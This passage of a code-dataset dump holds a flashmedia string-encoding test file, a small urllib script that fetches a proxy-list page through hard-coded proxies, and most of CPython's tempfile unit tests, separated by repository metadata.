from __future__ import unicode_literals
from . import with_fd
from flashmedia.types import ScriptDataLongString
ASCII = b"\x00\x00\x00\x03ABC"
ASCII_SIZE = len(ASCII)
UTF8 = b"\x00\x00\x00\t\xe6\x97\xa5\xe6\x9c\xac\xe8\xaa\x9e"
UTF8_SIZE = len(UTF8)
BROKEN_UTF8 = b"\x00\x00\x00\x08\xe6\x97\xa5\xe6\x9c\xac\xe8\xaa"
BROKEN_UTF8_SIZE = len(BROKEN_UTF8)
def test_pack_ascii():
assert ScriptDataLongString("ABC", "ascii") == ASCII
def test_pack_utf8():
assert ScriptDataLongString("日本語") == UTF8
def test_pack_into():
size = ASCII_SIZE + UTF8_SIZE
buf = bytearray(size)
offset = 0
offset = ScriptDataLongString.pack_into(buf, offset, "ABC", "ascii")
offset = ScriptDataLongString.pack_into(buf, offset, "日本語")
assert buf == (ASCII + UTF8)
assert offset == size
def test_size_ascii():
assert ScriptDataLongString.size("ABC", "ascii") == ASCII_SIZE
def test_size_utf8():
assert ScriptDataLongString.size("日本語") == UTF8_SIZE
@with_fd(ASCII)
def test_read_ascii(fd):
assert ScriptDataLongString.read(fd, "ascii") == "ABC"
assert fd.tell() == ASCII_SIZE
@with_fd(UTF8)
def test_read_utf8(fd):
assert ScriptDataLongString.read(fd) == "日本語"
assert fd.tell() == UTF8_SIZE
@with_fd(BROKEN_UTF8)
def test_read_broken_utf8(fd):
assert ScriptDataLongString.read(fd) == "日本"
assert fd.tell() == BROKEN_UTF8_SIZE
def test_unpack_from():
buf = ASCII + UTF8 + BROKEN_UTF8
offset = 0
val, offset = ScriptDataLongString.unpack_from(buf, offset)
assert val == "ABC"
val, offset = ScriptDataLongString.unpack_from(buf, offset)
assert val == "日本語"
val, offset = ScriptDataLongString.unpack_from(buf, offset)
assert val == "日本"
| [
"[email protected]"
] | |
3468f78680d2c6fa3b3616f9121f4dae00214184 | ce55c319f5a78b69fefc63595d433864a2e531b5 | /爬虫知识/爬虫/04day/04-爬取音乐.py | 66b60b9b5ade7ecbd06ebc3bde5dd9fae6443f39 | [] | no_license | Suijng/1809_data | a072c875e8746190e3b715e53f1afe3323f4666b | 45f8a57089f5c30ccc1a3cddb03b76dc95355417 | refs/heads/master | 2022-12-21T12:38:30.458291 | 2019-09-27T01:14:41 | 2019-09-27T01:14:41 | 211,207,071 | 0 | 0 | null | 2022-11-22T03:16:18 | 2019-09-27T00:55:21 | HTML | UTF-8 | Python | false | false | 360 | py | import urllib.request
proxy={
'http':'61.176.223.7:58822',
'https':'119.102.132.60:31325'
}
handler = urllib.request.ProxyHandler(
proxies=proxy
)
opener = urllib.request.build_opener(handler)
request = urllib.request.Request(url='http://www.xicidaili.com/')
response = opener.open(request)
content = response.read().decode()
print(content) | [
"[email protected]"
] | |
f7d8f662b47b19b1207a866a5facfa1516f5aeb8 | 02680f3057c3acd9c5a70474d37f76ac9fe39cd2 | /Python Environment Setup/Alternate/1. Python/1. Installer/Python-3.4.0(Linux)/Lib/test/test_tempfile.py | cf2ae080bed9269d4cb4c40d27e964fefb779988 | [
"Apache-2.0",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-python-cwi",
"GPL-1.0-or-later",
"LicenseRef-scancode-other-copyleft",
"Python-2.0"
] | permissive | tpsatish95/Python-Workshop | 1b43e25487b48d51185947e244845b41f199da6f | 5f4da07c96cfd0ae76a502efc8acb94409347946 | refs/heads/master | 2022-11-04T02:31:49.286334 | 2017-02-26T13:35:29 | 2017-02-26T13:35:29 | 44,395,862 | 1 | 2 | Apache-2.0 | 2022-10-21T00:22:22 | 2015-10-16T16:02:24 | Python | UTF-8 | Python | false | false | 41,583 | py | # tempfile.py unit tests.
import tempfile
import errno
import io
import os
import signal
import sys
import re
import warnings
import contextlib
import weakref
import unittest
from test import support, script_helper
if hasattr(os, 'stat'):
import stat
has_stat = 1
else:
has_stat = 0
has_textmode = (tempfile._text_openflags != tempfile._bin_openflags)
has_spawnl = hasattr(os, 'spawnl')
# TEST_FILES may need to be tweaked for systems depending on the maximum
# number of files that can be opened at one time (see ulimit -n)
if sys.platform.startswith('openbsd'):
TEST_FILES = 48
else:
TEST_FILES = 100
# This is organized as one test for each chunk of code in tempfile.py,
# in order of their appearance in the file. Testing which requires
# threads is not done here.
# Common functionality.
class BaseTestCase(unittest.TestCase):
str_check = re.compile(r"^[a-z0-9_-]{8}$")
def setUp(self):
self._warnings_manager = support.check_warnings()
self._warnings_manager.__enter__()
warnings.filterwarnings("ignore", category=RuntimeWarning,
message="mktemp", module=__name__)
def tearDown(self):
self._warnings_manager.__exit__(None, None, None)
def nameCheck(self, name, dir, pre, suf):
(ndir, nbase) = os.path.split(name)
npre = nbase[:len(pre)]
nsuf = nbase[len(nbase)-len(suf):]
# check for equality of the absolute paths!
self.assertEqual(os.path.abspath(ndir), os.path.abspath(dir),
"file '%s' not in directory '%s'" % (name, dir))
self.assertEqual(npre, pre,
"file '%s' does not begin with '%s'" % (nbase, pre))
self.assertEqual(nsuf, suf,
"file '%s' does not end with '%s'" % (nbase, suf))
nbase = nbase[len(pre):len(nbase)-len(suf)]
self.assertTrue(self.str_check.match(nbase),
"random string '%s' does not match ^[a-z0-9_-]{8}$"
% nbase)
class TestExports(BaseTestCase):
def test_exports(self):
# There are no surprising symbols in the tempfile module
dict = tempfile.__dict__
expected = {
"NamedTemporaryFile" : 1,
"TemporaryFile" : 1,
"mkstemp" : 1,
"mkdtemp" : 1,
"mktemp" : 1,
"TMP_MAX" : 1,
"gettempprefix" : 1,
"gettempdir" : 1,
"tempdir" : 1,
"template" : 1,
"SpooledTemporaryFile" : 1,
"TemporaryDirectory" : 1,
}
unexp = []
for key in dict:
if key[0] != '_' and key not in expected:
unexp.append(key)
self.assertTrue(len(unexp) == 0,
"unexpected keys: %s" % unexp)
class TestRandomNameSequence(BaseTestCase):
"""Test the internal iterator object _RandomNameSequence."""
def setUp(self):
self.r = tempfile._RandomNameSequence()
super().setUp()
def test_get_six_char_str(self):
# _RandomNameSequence returns a six-character string
s = next(self.r)
self.nameCheck(s, '', '', '')
def test_many(self):
# _RandomNameSequence returns no duplicate strings (stochastic)
dict = {}
r = self.r
for i in range(TEST_FILES):
s = next(r)
self.nameCheck(s, '', '', '')
self.assertNotIn(s, dict)
dict[s] = 1
def supports_iter(self):
# _RandomNameSequence supports the iterator protocol
i = 0
r = self.r
for s in r:
i += 1
if i == 20:
break
@unittest.skipUnless(hasattr(os, 'fork'),
"os.fork is required for this test")
def test_process_awareness(self):
# ensure that the random source differs between
# child and parent.
read_fd, write_fd = os.pipe()
pid = None
try:
pid = os.fork()
if not pid:
os.close(read_fd)
os.write(write_fd, next(self.r).encode("ascii"))
os.close(write_fd)
# bypass the normal exit handlers- leave those to
# the parent.
os._exit(0)
parent_value = next(self.r)
child_value = os.read(read_fd, len(parent_value)).decode("ascii")
finally:
if pid:
# best effort to ensure the process can't bleed out
# via any bugs above
try:
os.kill(pid, signal.SIGKILL)
except OSError:
pass
os.close(read_fd)
os.close(write_fd)
self.assertNotEqual(child_value, parent_value)
class TestCandidateTempdirList(BaseTestCase):
"""Test the internal function _candidate_tempdir_list."""
def test_nonempty_list(self):
# _candidate_tempdir_list returns a nonempty list of strings
cand = tempfile._candidate_tempdir_list()
self.assertFalse(len(cand) == 0)
for c in cand:
self.assertIsInstance(c, str)
def test_wanted_dirs(self):
# _candidate_tempdir_list contains the expected directories
# Make sure the interesting environment variables are all set.
with support.EnvironmentVarGuard() as env:
for envname in 'TMPDIR', 'TEMP', 'TMP':
dirname = os.getenv(envname)
if not dirname:
env[envname] = os.path.abspath(envname)
cand = tempfile._candidate_tempdir_list()
for envname in 'TMPDIR', 'TEMP', 'TMP':
dirname = os.getenv(envname)
if not dirname: raise ValueError
self.assertIn(dirname, cand)
try:
dirname = os.getcwd()
except (AttributeError, OSError):
dirname = os.curdir
self.assertIn(dirname, cand)
# Not practical to try to verify the presence of OS-specific
# paths in this list.
# We test _get_default_tempdir some more by testing gettempdir.
class TestGetDefaultTempdir(BaseTestCase):
"""Test _get_default_tempdir()."""
def test_no_files_left_behind(self):
# use a private empty directory
with tempfile.TemporaryDirectory() as our_temp_directory:
# force _get_default_tempdir() to consider our empty directory
def our_candidate_list():
return [our_temp_directory]
with support.swap_attr(tempfile, "_candidate_tempdir_list",
our_candidate_list):
# verify our directory is empty after _get_default_tempdir()
tempfile._get_default_tempdir()
self.assertEqual(os.listdir(our_temp_directory), [])
def raise_OSError(*args, **kwargs):
raise OSError()
with support.swap_attr(io, "open", raise_OSError):
# test again with failing io.open()
with self.assertRaises(FileNotFoundError):
tempfile._get_default_tempdir()
self.assertEqual(os.listdir(our_temp_directory), [])
open = io.open
def bad_writer(*args, **kwargs):
fp = open(*args, **kwargs)
fp.write = raise_OSError
return fp
with support.swap_attr(io, "open", bad_writer):
# test again with failing write()
with self.assertRaises(FileNotFoundError):
tempfile._get_default_tempdir()
self.assertEqual(os.listdir(our_temp_directory), [])
class TestGetCandidateNames(BaseTestCase):
"""Test the internal function _get_candidate_names."""
def test_retval(self):
# _get_candidate_names returns a _RandomNameSequence object
obj = tempfile._get_candidate_names()
self.assertIsInstance(obj, tempfile._RandomNameSequence)
def test_same_thing(self):
# _get_candidate_names always returns the same object
a = tempfile._get_candidate_names()
b = tempfile._get_candidate_names()
self.assertTrue(a is b)
@contextlib.contextmanager
def _inside_empty_temp_dir():
dir = tempfile.mkdtemp()
try:
with support.swap_attr(tempfile, 'tempdir', dir):
yield
finally:
support.rmtree(dir)
def _mock_candidate_names(*names):
return support.swap_attr(tempfile,
'_get_candidate_names',
lambda: iter(names))
class TestMkstempInner(BaseTestCase):
"""Test the internal function _mkstemp_inner."""
class mkstemped:
_bflags = tempfile._bin_openflags
_tflags = tempfile._text_openflags
_close = os.close
_unlink = os.unlink
def __init__(self, dir, pre, suf, bin):
if bin: flags = self._bflags
else: flags = self._tflags
(self.fd, self.name) = tempfile._mkstemp_inner(dir, pre, suf, flags)
def write(self, str):
os.write(self.fd, str)
def __del__(self):
self._close(self.fd)
self._unlink(self.name)
def do_create(self, dir=None, pre="", suf="", bin=1):
if dir is None:
dir = tempfile.gettempdir()
file = self.mkstemped(dir, pre, suf, bin)
self.nameCheck(file.name, dir, pre, suf)
return file
def test_basic(self):
# _mkstemp_inner can create files
self.do_create().write(b"blat")
self.do_create(pre="a").write(b"blat")
self.do_create(suf="b").write(b"blat")
self.do_create(pre="a", suf="b").write(b"blat")
self.do_create(pre="aa", suf=".txt").write(b"blat")
def test_basic_many(self):
# _mkstemp_inner can create many files (stochastic)
extant = list(range(TEST_FILES))
for i in extant:
extant[i] = self.do_create(pre="aa")
def test_choose_directory(self):
# _mkstemp_inner can create files in a user-selected directory
dir = tempfile.mkdtemp()
try:
self.do_create(dir=dir).write(b"blat")
finally:
os.rmdir(dir)
@unittest.skipUnless(has_stat, 'os.stat not available')
def test_file_mode(self):
# _mkstemp_inner creates files with the proper mode
file = self.do_create()
mode = stat.S_IMODE(os.stat(file.name).st_mode)
expected = 0o600
if sys.platform == 'win32':
# There's no distinction among 'user', 'group' and 'world';
# replicate the 'user' bits.
user = expected >> 6
expected = user * (1 + 8 + 64)
self.assertEqual(mode, expected)
@unittest.skipUnless(has_spawnl, 'os.spawnl not available')
def test_noinherit(self):
# _mkstemp_inner file handles are not inherited by child processes
if support.verbose:
v="v"
else:
v="q"
file = self.do_create()
self.assertEqual(os.get_inheritable(file.fd), False)
fd = "%d" % file.fd
try:
me = __file__
except NameError:
me = sys.argv[0]
# We have to exec something, so that FD_CLOEXEC will take
# effect. The core of this test is therefore in
# tf_inherit_check.py, which see.
tester = os.path.join(os.path.dirname(os.path.abspath(me)),
"tf_inherit_check.py")
# On Windows a spawn* /path/ with embedded spaces shouldn't be quoted,
# but an arg with embedded spaces should be decorated with double
# quotes on each end
if sys.platform == 'win32':
decorated = '"%s"' % sys.executable
tester = '"%s"' % tester
else:
decorated = sys.executable
retval = os.spawnl(os.P_WAIT, sys.executable, decorated, tester, v, fd)
self.assertFalse(retval < 0,
"child process caught fatal signal %d" % -retval)
self.assertFalse(retval > 0, "child process reports failure %d"%retval)
@unittest.skipUnless(has_textmode, "text mode not available")
def test_textmode(self):
# _mkstemp_inner can create files in text mode
# A text file is truncated at the first Ctrl+Z byte
f = self.do_create(bin=0)
f.write(b"blat\x1a")
f.write(b"extra\n")
os.lseek(f.fd, 0, os.SEEK_SET)
self.assertEqual(os.read(f.fd, 20), b"blat")
def default_mkstemp_inner(self):
return tempfile._mkstemp_inner(tempfile.gettempdir(),
tempfile.template,
'',
tempfile._bin_openflags)
def test_collision_with_existing_file(self):
# _mkstemp_inner tries another name when a file with
# the chosen name already exists
with _inside_empty_temp_dir(), \
_mock_candidate_names('aaa', 'aaa', 'bbb'):
(fd1, name1) = self.default_mkstemp_inner()
os.close(fd1)
self.assertTrue(name1.endswith('aaa'))
(fd2, name2) = self.default_mkstemp_inner()
os.close(fd2)
self.assertTrue(name2.endswith('bbb'))
def test_collision_with_existing_directory(self):
# _mkstemp_inner tries another name when a directory with
# the chosen name already exists
with _inside_empty_temp_dir(), \
_mock_candidate_names('aaa', 'aaa', 'bbb'):
dir = tempfile.mkdtemp()
self.assertTrue(dir.endswith('aaa'))
(fd, name) = self.default_mkstemp_inner()
os.close(fd)
self.assertTrue(name.endswith('bbb'))
class TestGetTempPrefix(BaseTestCase):
"""Test gettempprefix()."""
def test_sane_template(self):
# gettempprefix returns a nonempty prefix string
p = tempfile.gettempprefix()
self.assertIsInstance(p, str)
self.assertTrue(len(p) > 0)
def test_usable_template(self):
# gettempprefix returns a usable prefix string
# Create a temp directory, avoiding use of the prefix.
# Then attempt to create a file whose name is
# prefix + 'xxxxxx.xxx' in that directory.
p = tempfile.gettempprefix() + "xxxxxx.xxx"
d = tempfile.mkdtemp(prefix="")
try:
p = os.path.join(d, p)
fd = os.open(p, os.O_RDWR | os.O_CREAT)
os.close(fd)
os.unlink(p)
finally:
os.rmdir(d)
class TestGetTempDir(BaseTestCase):
"""Test gettempdir()."""
def test_directory_exists(self):
# gettempdir returns a directory which exists
dir = tempfile.gettempdir()
self.assertTrue(os.path.isabs(dir) or dir == os.curdir,
"%s is not an absolute path" % dir)
self.assertTrue(os.path.isdir(dir),
"%s is not a directory" % dir)
def test_directory_writable(self):
# gettempdir returns a directory writable by the user
# sneaky: just instantiate a NamedTemporaryFile, which
# defaults to writing into the directory returned by
# gettempdir.
file = tempfile.NamedTemporaryFile()
file.write(b"blat")
file.close()
def test_same_thing(self):
# gettempdir always returns the same object
a = tempfile.gettempdir()
b = tempfile.gettempdir()
self.assertTrue(a is b)
def test_case_sensitive(self):
# gettempdir should not flatten its case
# even on a case-insensitive file system
case_sensitive_tempdir = tempfile.mkdtemp("-Temp")
_tempdir, tempfile.tempdir = tempfile.tempdir, None
try:
with support.EnvironmentVarGuard() as env:
# Fake the first env var which is checked as a candidate
env["TMPDIR"] = case_sensitive_tempdir
self.assertEqual(tempfile.gettempdir(), case_sensitive_tempdir)
finally:
tempfile.tempdir = _tempdir
support.rmdir(case_sensitive_tempdir)
class TestMkstemp(BaseTestCase):
"""Test mkstemp()."""
def do_create(self, dir=None, pre="", suf=""):
if dir is None:
dir = tempfile.gettempdir()
(fd, name) = tempfile.mkstemp(dir=dir, prefix=pre, suffix=suf)
(ndir, nbase) = os.path.split(name)
adir = os.path.abspath(dir)
self.assertEqual(adir, ndir,
"Directory '%s' incorrectly returned as '%s'" % (adir, ndir))
try:
self.nameCheck(name, dir, pre, suf)
finally:
os.close(fd)
os.unlink(name)
def test_basic(self):
# mkstemp can create files
self.do_create()
self.do_create(pre="a")
self.do_create(suf="b")
self.do_create(pre="a", suf="b")
self.do_create(pre="aa", suf=".txt")
self.do_create(dir=".")
def test_choose_directory(self):
# mkstemp can create directories in a user-selected directory
dir = tempfile.mkdtemp()
try:
self.do_create(dir=dir)
finally:
os.rmdir(dir)
class TestMkdtemp(BaseTestCase):
"""Test mkdtemp()."""
def do_create(self, dir=None, pre="", suf=""):
if dir is None:
dir = tempfile.gettempdir()
name = tempfile.mkdtemp(dir=dir, prefix=pre, suffix=suf)
try:
self.nameCheck(name, dir, pre, suf)
return name
except:
os.rmdir(name)
raise
def test_basic(self):
# mkdtemp can create directories
os.rmdir(self.do_create())
os.rmdir(self.do_create(pre="a"))
os.rmdir(self.do_create(suf="b"))
os.rmdir(self.do_create(pre="a", suf="b"))
os.rmdir(self.do_create(pre="aa", suf=".txt"))
def test_basic_many(self):
# mkdtemp can create many directories (stochastic)
extant = list(range(TEST_FILES))
try:
for i in extant:
extant[i] = self.do_create(pre="aa")
finally:
for i in extant:
if(isinstance(i, str)):
os.rmdir(i)
def test_choose_directory(self):
# mkdtemp can create directories in a user-selected directory
dir = tempfile.mkdtemp()
try:
os.rmdir(self.do_create(dir=dir))
finally:
os.rmdir(dir)
@unittest.skipUnless(has_stat, 'os.stat not available')
def test_mode(self):
# mkdtemp creates directories with the proper mode
dir = self.do_create()
try:
mode = stat.S_IMODE(os.stat(dir).st_mode)
mode &= 0o777 # Mask off sticky bits inherited from /tmp
expected = 0o700
if sys.platform == 'win32':
# There's no distinction among 'user', 'group' and 'world';
# replicate the 'user' bits.
user = expected >> 6
expected = user * (1 + 8 + 64)
self.assertEqual(mode, expected)
finally:
os.rmdir(dir)
def test_collision_with_existing_file(self):
# mkdtemp tries another name when a file with
# the chosen name already exists
with _inside_empty_temp_dir(), \
_mock_candidate_names('aaa', 'aaa', 'bbb'):
file = tempfile.NamedTemporaryFile(delete=False)
file.close()
self.assertTrue(file.name.endswith('aaa'))
dir = tempfile.mkdtemp()
self.assertTrue(dir.endswith('bbb'))
def test_collision_with_existing_directory(self):
# mkdtemp tries another name when a directory with
# the chosen name already exists
with _inside_empty_temp_dir(), \
_mock_candidate_names('aaa', 'aaa', 'bbb'):
dir1 = tempfile.mkdtemp()
self.assertTrue(dir1.endswith('aaa'))
dir2 = tempfile.mkdtemp()
self.assertTrue(dir2.endswith('bbb'))
class TestMktemp(BaseTestCase):
"""Test mktemp()."""
# For safety, all use of mktemp must occur in a private directory.
# We must also suppress the RuntimeWarning it generates.
def setUp(self):
self.dir = tempfile.mkdtemp()
super().setUp()
def tearDown(self):
if self.dir:
os.rmdir(self.dir)
self.dir = None
super().tearDown()
class mktemped:
_unlink = os.unlink
_bflags = tempfile._bin_openflags
def __init__(self, dir, pre, suf):
self.name = tempfile.mktemp(dir=dir, prefix=pre, suffix=suf)
# Create the file. This will raise an exception if it's
# mysteriously appeared in the meanwhile.
os.close(os.open(self.name, self._bflags, 0o600))
def __del__(self):
self._unlink(self.name)
def do_create(self, pre="", suf=""):
file = self.mktemped(self.dir, pre, suf)
self.nameCheck(file.name, self.dir, pre, suf)
return file
def test_basic(self):
# mktemp can choose usable file names
self.do_create()
self.do_create(pre="a")
self.do_create(suf="b")
self.do_create(pre="a", suf="b")
self.do_create(pre="aa", suf=".txt")
def test_many(self):
# mktemp can choose many usable file names (stochastic)
extant = list(range(TEST_FILES))
for i in extant:
extant[i] = self.do_create(pre="aa")
## def test_warning(self):
## # mktemp issues a warning when used
## warnings.filterwarnings("error",
## category=RuntimeWarning,
## message="mktemp")
## self.assertRaises(RuntimeWarning,
## tempfile.mktemp, dir=self.dir)
# We test _TemporaryFileWrapper by testing NamedTemporaryFile.
class TestNamedTemporaryFile(BaseTestCase):
"""Test NamedTemporaryFile()."""
def do_create(self, dir=None, pre="", suf="", delete=True):
if dir is None:
dir = tempfile.gettempdir()
file = tempfile.NamedTemporaryFile(dir=dir, prefix=pre, suffix=suf,
delete=delete)
self.nameCheck(file.name, dir, pre, suf)
return file
def test_basic(self):
# NamedTemporaryFile can create files
self.do_create()
self.do_create(pre="a")
self.do_create(suf="b")
self.do_create(pre="a", suf="b")
self.do_create(pre="aa", suf=".txt")
def test_method_lookup(self):
# Issue #18879: Looking up a temporary file method should keep it
# alive long enough.
f = self.do_create()
wr = weakref.ref(f)
write = f.write
write2 = f.write
del f
write(b'foo')
del write
write2(b'bar')
del write2
if support.check_impl_detail(cpython=True):
# No reference cycle was created.
self.assertIsNone(wr())
def test_creates_named(self):
# NamedTemporaryFile creates files with names
f = tempfile.NamedTemporaryFile()
self.assertTrue(os.path.exists(f.name),
"NamedTemporaryFile %s does not exist" % f.name)
def test_del_on_close(self):
# A NamedTemporaryFile is deleted when closed
dir = tempfile.mkdtemp()
try:
f = tempfile.NamedTemporaryFile(dir=dir)
f.write(b'blat')
f.close()
self.assertFalse(os.path.exists(f.name),
"NamedTemporaryFile %s exists after close" % f.name)
finally:
os.rmdir(dir)
def test_dis_del_on_close(self):
# Tests that delete-on-close can be disabled
dir = tempfile.mkdtemp()
tmp = None
try:
f = tempfile.NamedTemporaryFile(dir=dir, delete=False)
tmp = f.name
f.write(b'blat')
f.close()
self.assertTrue(os.path.exists(f.name),
"NamedTemporaryFile %s missing after close" % f.name)
finally:
if tmp is not None:
os.unlink(tmp)
os.rmdir(dir)
def test_multiple_close(self):
# A NamedTemporaryFile can be closed many times without error
f = tempfile.NamedTemporaryFile()
f.write(b'abc\n')
f.close()
f.close()
f.close()
def test_context_manager(self):
# A NamedTemporaryFile can be used as a context manager
with tempfile.NamedTemporaryFile() as f:
self.assertTrue(os.path.exists(f.name))
self.assertFalse(os.path.exists(f.name))
def use_closed():
with f:
pass
self.assertRaises(ValueError, use_closed)
# How to test the mode and bufsize parameters?
class TestSpooledTemporaryFile(BaseTestCase):
"""Test SpooledTemporaryFile()."""
def do_create(self, max_size=0, dir=None, pre="", suf=""):
if dir is None:
dir = tempfile.gettempdir()
file = tempfile.SpooledTemporaryFile(max_size=max_size, dir=dir, prefix=pre, suffix=suf)
return file
def test_basic(self):
# SpooledTemporaryFile can create files
f = self.do_create()
self.assertFalse(f._rolled)
f = self.do_create(max_size=100, pre="a", suf=".txt")
self.assertFalse(f._rolled)
def test_del_on_close(self):
# A SpooledTemporaryFile is deleted when closed
dir = tempfile.mkdtemp()
try:
f = tempfile.SpooledTemporaryFile(max_size=10, dir=dir)
self.assertFalse(f._rolled)
f.write(b'blat ' * 5)
self.assertTrue(f._rolled)
filename = f.name
f.close()
self.assertFalse(isinstance(filename, str) and os.path.exists(filename),
"SpooledTemporaryFile %s exists after close" % filename)
finally:
os.rmdir(dir)
def test_rewrite_small(self):
# A SpooledTemporaryFile can be written to multiple within the max_size
f = self.do_create(max_size=30)
self.assertFalse(f._rolled)
for i in range(5):
f.seek(0, 0)
f.write(b'x' * 20)
self.assertFalse(f._rolled)
def test_write_sequential(self):
# A SpooledTemporaryFile should hold exactly max_size bytes, and roll
# over afterward
f = self.do_create(max_size=30)
self.assertFalse(f._rolled)
f.write(b'x' * 20)
self.assertFalse(f._rolled)
f.write(b'x' * 10)
self.assertFalse(f._rolled)
f.write(b'x')
self.assertTrue(f._rolled)
def test_writelines(self):
# Verify writelines with a SpooledTemporaryFile
f = self.do_create()
f.writelines((b'x', b'y', b'z'))
f.seek(0)
buf = f.read()
self.assertEqual(buf, b'xyz')
def test_writelines_sequential(self):
# A SpooledTemporaryFile should hold exactly max_size bytes, and roll
# over afterward
f = self.do_create(max_size=35)
f.writelines((b'x' * 20, b'x' * 10, b'x' * 5))
self.assertFalse(f._rolled)
f.write(b'x')
self.assertTrue(f._rolled)
def test_sparse(self):
# A SpooledTemporaryFile that is written late in the file will extend
# when that occurs
f = self.do_create(max_size=30)
self.assertFalse(f._rolled)
f.seek(100, 0)
self.assertFalse(f._rolled)
f.write(b'x')
self.assertTrue(f._rolled)
def test_fileno(self):
# A SpooledTemporaryFile should roll over to a real file on fileno()
f = self.do_create(max_size=30)
self.assertFalse(f._rolled)
self.assertTrue(f.fileno() > 0)
self.assertTrue(f._rolled)
def test_multiple_close_before_rollover(self):
# A SpooledTemporaryFile can be closed many times without error
f = tempfile.SpooledTemporaryFile()
f.write(b'abc\n')
self.assertFalse(f._rolled)
f.close()
f.close()
f.close()
def test_multiple_close_after_rollover(self):
# A SpooledTemporaryFile can be closed many times without error
f = tempfile.SpooledTemporaryFile(max_size=1)
f.write(b'abc\n')
self.assertTrue(f._rolled)
f.close()
f.close()
f.close()
def test_bound_methods(self):
# It should be OK to steal a bound method from a SpooledTemporaryFile
# and use it independently; when the file rolls over, those bound
# methods should continue to function
f = self.do_create(max_size=30)
read = f.read
write = f.write
seek = f.seek
write(b"a" * 35)
write(b"b" * 35)
seek(0, 0)
self.assertEqual(read(70), b'a'*35 + b'b'*35)
def test_properties(self):
f = tempfile.SpooledTemporaryFile(max_size=10)
f.write(b'x' * 10)
self.assertFalse(f._rolled)
self.assertEqual(f.mode, 'w+b')
self.assertIsNone(f.name)
with self.assertRaises(AttributeError):
f.newlines
with self.assertRaises(AttributeError):
f.encoding
f.write(b'x')
self.assertTrue(f._rolled)
self.assertEqual(f.mode, 'rb+')
self.assertIsNotNone(f.name)
with self.assertRaises(AttributeError):
f.newlines
with self.assertRaises(AttributeError):
f.encoding
def test_text_mode(self):
# Creating a SpooledTemporaryFile with a text mode should produce
# a file object reading and writing (Unicode) text strings.
f = tempfile.SpooledTemporaryFile(mode='w+', max_size=10)
f.write("abc\n")
f.seek(0)
self.assertEqual(f.read(), "abc\n")
f.write("def\n")
f.seek(0)
self.assertEqual(f.read(), "abc\ndef\n")
self.assertFalse(f._rolled)
self.assertEqual(f.mode, 'w+')
self.assertIsNone(f.name)
self.assertIsNone(f.newlines)
self.assertIsNone(f.encoding)
f.write("xyzzy\n")
f.seek(0)
self.assertEqual(f.read(), "abc\ndef\nxyzzy\n")
# Check that Ctrl+Z doesn't truncate the file
f.write("foo\x1abar\n")
f.seek(0)
self.assertEqual(f.read(), "abc\ndef\nxyzzy\nfoo\x1abar\n")
self.assertTrue(f._rolled)
self.assertEqual(f.mode, 'w+')
self.assertIsNotNone(f.name)
self.assertEqual(f.newlines, os.linesep)
self.assertIsNotNone(f.encoding)
def test_text_newline_and_encoding(self):
f = tempfile.SpooledTemporaryFile(mode='w+', max_size=10,
newline='', encoding='utf-8')
f.write("\u039B\r\n")
f.seek(0)
self.assertEqual(f.read(), "\u039B\r\n")
self.assertFalse(f._rolled)
self.assertEqual(f.mode, 'w+')
self.assertIsNone(f.name)
self.assertIsNone(f.newlines)
self.assertIsNone(f.encoding)
f.write("\u039B" * 20 + "\r\n")
f.seek(0)
self.assertEqual(f.read(), "\u039B\r\n" + ("\u039B" * 20) + "\r\n")
self.assertTrue(f._rolled)
self.assertEqual(f.mode, 'w+')
self.assertIsNotNone(f.name)
self.assertIsNotNone(f.newlines)
self.assertEqual(f.encoding, 'utf-8')
def test_context_manager_before_rollover(self):
# A SpooledTemporaryFile can be used as a context manager
with tempfile.SpooledTemporaryFile(max_size=1) as f:
self.assertFalse(f._rolled)
self.assertFalse(f.closed)
self.assertTrue(f.closed)
def use_closed():
with f:
pass
self.assertRaises(ValueError, use_closed)
def test_context_manager_during_rollover(self):
# A SpooledTemporaryFile can be used as a context manager
with tempfile.SpooledTemporaryFile(max_size=1) as f:
self.assertFalse(f._rolled)
f.write(b'abc\n')
f.flush()
self.assertTrue(f._rolled)
self.assertFalse(f.closed)
self.assertTrue(f.closed)
def use_closed():
with f:
pass
self.assertRaises(ValueError, use_closed)
def test_context_manager_after_rollover(self):
# A SpooledTemporaryFile can be used as a context manager
f = tempfile.SpooledTemporaryFile(max_size=1)
f.write(b'abc\n')
f.flush()
self.assertTrue(f._rolled)
with f:
self.assertFalse(f.closed)
self.assertTrue(f.closed)
def use_closed():
with f:
pass
self.assertRaises(ValueError, use_closed)
def test_truncate_with_size_parameter(self):
# A SpooledTemporaryFile can be truncated to zero size
f = tempfile.SpooledTemporaryFile(max_size=10)
f.write(b'abcdefg\n')
f.seek(0)
f.truncate()
self.assertFalse(f._rolled)
self.assertEqual(f._file.getvalue(), b'')
# A SpooledTemporaryFile can be truncated to a specific size
f = tempfile.SpooledTemporaryFile(max_size=10)
f.write(b'abcdefg\n')
f.truncate(4)
self.assertFalse(f._rolled)
self.assertEqual(f._file.getvalue(), b'abcd')
# A SpooledTemporaryFile rolls over if truncated to large size
f = tempfile.SpooledTemporaryFile(max_size=10)
f.write(b'abcdefg\n')
f.truncate(20)
self.assertTrue(f._rolled)
if has_stat:
self.assertEqual(os.fstat(f.fileno()).st_size, 20)
if tempfile.NamedTemporaryFile is not tempfile.TemporaryFile:
class TestTemporaryFile(BaseTestCase):
"""Test TemporaryFile()."""
def test_basic(self):
# TemporaryFile can create files
# No point in testing the name params - the file has no name.
tempfile.TemporaryFile()
def test_has_no_name(self):
# TemporaryFile creates files with no names (on this system)
dir = tempfile.mkdtemp()
f = tempfile.TemporaryFile(dir=dir)
f.write(b'blat')
# Sneaky: because this file has no name, it should not prevent
# us from removing the directory it was created in.
try:
os.rmdir(dir)
except:
# cleanup
f.close()
os.rmdir(dir)
raise
def test_multiple_close(self):
# A TemporaryFile can be closed many times without error
f = tempfile.TemporaryFile()
f.write(b'abc\n')
f.close()
f.close()
f.close()
# How to test the mode and bufsize parameters?
def test_mode_and_encoding(self):
def roundtrip(input, *args, **kwargs):
with tempfile.TemporaryFile(*args, **kwargs) as fileobj:
fileobj.write(input)
fileobj.seek(0)
self.assertEqual(input, fileobj.read())
roundtrip(b"1234", "w+b")
roundtrip("abdc\n", "w+")
roundtrip("\u039B", "w+", encoding="utf-16")
roundtrip("foo\r\n", "w+", newline="")
# Helper for test_del_on_shutdown
class NulledModules:
def __init__(self, *modules):
self.refs = [mod.__dict__ for mod in modules]
self.contents = [ref.copy() for ref in self.refs]
def __enter__(self):
for d in self.refs:
for key in d:
d[key] = None
def __exit__(self, *exc_info):
for d, c in zip(self.refs, self.contents):
d.clear()
d.update(c)
